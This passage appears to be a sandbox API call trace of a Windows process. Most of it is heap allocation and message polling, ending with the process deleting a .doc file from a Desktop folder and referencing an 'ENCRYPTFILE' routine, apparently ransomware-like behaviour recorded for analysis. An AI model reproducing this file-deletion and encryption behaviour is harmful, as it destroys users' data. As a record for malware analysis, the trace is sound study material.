dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0130.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0130.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0130.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0130.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0130.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0130.195] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0130.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0130.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0130.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0130.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac28 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab98 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0130.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0130.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0130.195] CloseHandle (hObject=0x258) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0130.198] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0130.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0130.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0130.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0130.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0130.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0130.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0130.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0130.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43faa98 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43924c8 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0130.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0130.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0130.214] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0130.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0130.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0130.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0130.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0130.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0130.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0130.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0130.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0130.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0130.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0130.215] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5qUH.doc", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5qUH.doc", lpFilePart=0x0) returned 0x2d [0130.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0130.215] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5qUH.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\5quh.doc")) returned 0x20 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0130.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0130.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0130.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0130.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a030 [0130.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0130.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0130.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0130.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0130.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0130.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0130.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0130.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0130.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0130.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0130.216] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5qUH.doc", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4afc3bf0, ftCreationTime.dwHighDateTime=0x1d5e6d3, ftLastAccessTime.dwLowDateTime=0x36306f20, ftLastAccessTime.dwHighDateTime=0x1d5f088, ftLastWriteTime.dwLowDateTime=0x36306f20, ftLastWriteTime.dwHighDateTime=0x1d5f088, nFileSizeHigh=0x0, nFileSizeLow=0x2b91, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="5qUH.doc", cAlternateFileName="")) returned 0x41ac640 [0130.216] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5qUH.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\5quh.doc")) returned 1 [0130.264] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4afc3bf0, ftCreationTime.dwHighDateTime=0x1d5e6d3, ftLastAccessTime.dwLowDateTime=0x36306f20, ftLastAccessTime.dwHighDateTime=0x1d5f088, ftLastWriteTime.dwLowDateTime=0x36306f20, ftLastWriteTime.dwHighDateTime=0x1d5f088, nFileSizeHigh=0x0, nFileSizeLow=0x2b91, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="5qUH.doc", cAlternateFileName="")) returned 0 [0130.266] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0130.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a030 | out: hHeap=0x1780000) returned 1 [0130.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0130.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0130.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0130.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0130.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0130.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0130.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0130.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0130.266] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0130.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0130.266] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0130.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0130.267] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0130.267] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0130.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0130.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0130.267] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0130.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0130.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0130.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0130.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0130.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0130.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0130.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0130.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0130.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0130.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0130.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0130.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369bb8 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf0) returned 0x4314740 